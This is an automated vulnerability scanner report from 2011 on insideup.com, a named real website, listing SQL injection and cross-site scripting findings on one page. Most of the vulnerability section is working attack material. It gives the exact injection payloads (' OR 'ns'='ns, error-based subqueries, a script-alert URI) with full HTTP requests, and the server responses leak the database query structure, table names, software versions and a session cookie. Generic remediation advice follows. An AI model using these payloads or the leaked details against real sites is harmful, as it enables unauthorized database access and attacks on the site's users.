Second Order SQL Injection, DORK, www.insideup.com SUMMARY

Loading

Netsparker - Scan Report Summary
TARGET URL
http://www.insideup.com/ppc/leadflow/hins00/p...
SCAN DATE
3/13/2011 9:34:39 AM
REPORT DATE
4/20/2011 6:56:23 AM
SCAN DURATION
00:14:07

Total Requests

Average Speed

req/sec.
16
identified
8
confirmed
4
critical
1
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
25 %
IMPORTANT
31 %
LOW
38 %
INFORMATION
6 %

GHDB, DORK VULNERABILITIES

GHDB, DORK VULNERABILITIES
URL Parameter Method Vulnerability Confirmed
/ppc/leadflow/hins00/project.php iusrc GET Boolean Based SQL Injection Yes
catId GET [Probable] SQL Injection No
iusrc GET [Probable] SQL Injection No
[Possible] Second Order SQL Injection No
nsextt GET Cross-site Scripting Yes
Query Based QUERYSTRING Cross-site Scripting Yes
catId GET Cross-site Scripting Yes
iusrc GET Cross-site Scripting Yes
Cookie Not Marked As HttpOnly Yes
Apache Version Disclosure No
Apache Version Disclosure No
PHP Version Disclosure No
PHP Version Disclosure No
catId GET Database Error Message No
MySQL Database Identified Yes
/ppc/leadflow/hins00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000004)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
Boolean Based SQL Injection

Boolean Based SQL Injection

1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed Netsparker to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

The best way to protect your code against SQL Injections is using parameterised queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

External References

Remedy References

- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc='+OR+'ns'%3d'ns

Parameters

Parameter Type Value
catId GET 50002
iusrc GET ' OR 'ns'='ns

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc='+OR+'ns'%3d'ns HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=npihp24902e7n3sk535t1v0c13
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 14:41:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base href="http://www.insideup.com/ppc/leadflow/">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
<meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
<meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
<link rel="stylesheet" href="css/newlanding_style.css" />
<link rel="stylesheet" href="style/dhtmlwindow.css" />
<link rel="stylesheet" href="css/ui.core.css" />
<link rel="stylesheet" href="css/Dyn_form_style.css" />
<script type="text/javascript" src='js/jquery.js'></script>
<script type="text/javascript" src="js/ui.core.js"></script>
<script type="text/javascript">
jQuery(document).ready(function() {
jQuery("form").attr("autocomplete", "off");
});
var global_form_attribute = 8 </script>

<script language="javascript" src="js/dhtmlwindow.js"></script>
<script language="javascript" src="js/modal.js"></script>
<script type="text/javascript" src="js/application_js.js"></script>
<link href="css/styles.css" rel="stylesheet" type="text/css" />
<script>
function frmprompt(){
frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
}
function frmprompt02(){
frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
}
</script>
<style>
#step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, {
font-size:12px;
width:100%;
}
.blackback {
background-color:#cccccc;
}
.whiteback {
background-color:#ffffff;
}
</style>
</head>
<body>
<div id="Main_div_wrap">
<div id="Main_Contant_Block">
<div id="lending_headern">
<table width="900" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="175" valign="middle">
<div style="padding-top: 13px; padding-bottom: 7px; padding-left: 13px;">
<a href="http://www.insideup.com/selectvendors.html" target="_blank"><img border="0" src="http://www.insideup.com/ppc/tools/images/newlanding_insideuplogo.jpg"/></a>
</div>
</td>

<td width="729">
<div class="Tx_S24 Tx_BlueL Tx_B" style="padding-top: 29px; padding-bottom: 10px; padding-left: 13px;"> Compare Managed VoIP Services<br />
<span class="Tx_S14 Tx_B Tx_black"> Get Free Comparison Guide, Plus 5 Quotes from Top Managed VoIP Companies</span>
</div>
</td>
</tr>
</table>
</div>

<div class="process_section">
<div class="left_ronud"></div>
<div class="mid_process">
<table width="100%" border="0" cellspacing="0" cellpadding="0" style="margin-top:10px;">
<tr>
<td width="4%"><img src="http://www.insideup.com/ppc/tools/images/110005/04052010170401_2.jpg" width="34" height="64" /></td>
<td width="23%" style="padding-left: 8px;"><span class="Green_Txt" style="display:block;">Describe Your Project </span> <span class="Light_blackText">Takes 2 Minutes</span></td>
<td width="7%" align="right" style="border-left:1px solid #c7c7c7;"><img src="http://www.insideup.com/ppc/tools/images/110005/04052010170401_3.jpg" width="38" height="64" /></td>
<td width="34%" style="padding-left:8px;"><span class="Green_Txt" style="display:block;">Get Matched with Top Vendors </span> <span class="Light_blackText">8x8, Fonality, Vocalocity & More</span></td>
<td width="7%" align="right" style="border-left:1px solid #c7c7c7;"><img src="http://www.insideup.com/ppc/tools/images/110005/04052010170401_4.jpg" width="38" height="64" /></td>
<td width="25%" style="padding-left:8px;"><span class="Green_Txt" style="display:block;">Compare Quotes & Save </span> <span class="Light_blackText">No Obligation to Buy</span></td>
</tr>
</table>
</div>
<div class="right_ronud"></div>
</div>

<div class="form_area_section">
<div class="mid_form_left_section">
<form method="post" action="project_dynamic_page_updated.php?catId=110005&group=ManagedVoIP&template=3" ID="insideupform" name="insideupform" onsubmit="return checkValues();">
<input type="hidden" name="subcategoryId" value="110005">
<input type="hidden" name="catId" value="110005">
<input type="hidden" name="iusrc" value="' OR 'ns'='ns ">

<table width="550" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="535" align="right" class="Green_Txt1 Tx_S18 Tx_B">
<div id="modalalertdiv" style="display:none;">
<div class="myformpopbox">
<strong>What is InsideUp?</strong><br />
InsideUp is a unique and free online community where businesses such
as yours can connect with qualified vendors of business services who
compete for your business.<br />
<br />
<strong>How does it work?</strong><br />
You answer some questions about your business needs, and provide us
with your company and contact information, and we match you using our
superior matching technology with up to 5 reputable vendors, who will
respond within one business day either by phone or email.<br />
<br />
<strong>How do you protect my privacy?</strong><br />
InsideUp is an accredited business by the Better Business Bureau and
is secured by DigiCert. Your information is highly secure with us and
will only be given to up to 5 pre-screened, reputable vendors matched
to your specific needs.
</div>
</div>
</td>
</tr>

<tr>
<td height="30" valign="middle">
<div style="padding-left:1px;">
<span style="font-size: 12px;" class="Tx_S9">
Need to Talk to a Representative? <span style="color:#FF803E">Call (800) 417-9210</span> Anytime
</span>
</div>
</td>
</tr>

<tr>
<td>
<div style="float:left;">

<div id="Dyn_head" style="clear:left;float:left;">
<div class="Head_Txt" style="float:left;padding-left:8px;">Submit Your VoIP Needs</div>
<div style="float:right;padding-top:10px;padding-right:8px;"><span class="Tx_S9"><span class='Tx_S9'>Questions? </span><a href='#' onClick='frmprompt(); return false' class='bluetext Tx_S9'>Review FAQs</a></span></div>
</div>

<div id="Dyn_mid" style="clear:left;float:left;position:relative;">
<!-- -->

<div id="step_1" class="form-panel ">
<div class="mid_head_top_new">
<div class="Head_Txt_blue_new" style='margin-right:15px'>
What type of data connection do you have? <span style="color:#000000;font-size:12px;">
(select one answer) </span>
</div>

</div>

<div style="float:left;width:215px;padding-left:8px;"><img src="images/Employ_girl.jpg" width="215" height="251" /></div>

<div style="height:230px;width:315px;overflow:auto;">
<p style="padding-top:10px;">
<div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" checked="checked" value="1553__DSL" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>DSL</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1554__T1" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>T1</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1555__T3" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>T3</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1556__Cable" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Cable</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1557__Fiber" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Fiber</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1558__Satellite" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Satellite</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1559__Other" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Other</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1560__Don't have broadband connection" id="radio_1" name="attributeId_331"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Don't have broadband connection</label></div></div> </p>
</div>
</div>
<div id="step_2" class="form-panel ui-helper-hidden">
<div class="mid_head_top_new">
<div class="Head_Txt_blue_new" style='margin-right:15px'>
What best describes your desired solution? <span style="color:#000000;font-size:12px;">
(select one answer) </span>
</div>

</div>

<div style="float:left;width:215px;padding-left:8px;"><img src="images/Employ_girl.jpg" width="215" height="251" /></div>

<div style="height:230px;width:315px;overflow:auto;">
<p style="padding-top:10px;">
<div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" checked="checked" value="1517__One office" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>One office</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1518__Multiple office" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Multiple office</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1519__Call center" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Call center</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1520__Home office" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Home office</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1569__Not Sure" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Not Sure</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1570__Other" id="radio_2" name="attributeId_327"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Other</label></div></div> </p>
</div>
</div>
<div id="step_3" class="form-panel ui-helper-hidden">
<div class="mid_head_top_new">
<div class="Head_Txt_blue_new" style='margin-right:15px'>
How soon do you plan to purchase VoIP service? <span style="color:#000000;font-size:12px;">
(select one answer) </span>
</div>

</div>

<div style="float:left;width:215px;padding-left:8px;"><img src="images/Employ_girl.jpg" width="215" height="251" /></div>

<div style="height:230px;width:315px;overflow:auto;">
<p style="padding-top:10px;">
<div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" checked="checked" value="1530__ASAP" id="radio_3" name="attributeId_329"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>ASAP</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1531__Within 1 month" id="radio_3" name="attributeId_329"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Within 1 month</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="1532__Between 2 and 4 months" id=&quo..
[Probable] SQL Injection

[Probable] SQL Injection

2 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Request

GET /ppc/leadflow/hins00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=npihp24902e7n3sk535t1v0c13
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 14:34:45 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5230
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 50002
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=npihp24902e7n3sk535t1v0c13
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 14:41:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 3358
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
[Possible] Second Order SQL Injection

[Possible] Second Order SQL Injection

1 TOTAL
CRITICAL
Second Order SQL Injection occurs when data input stored in a place and then used in a different SQL Query without correct filtering or without using parameterised queries. Even though Netsparker believes that there is a Second Order SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

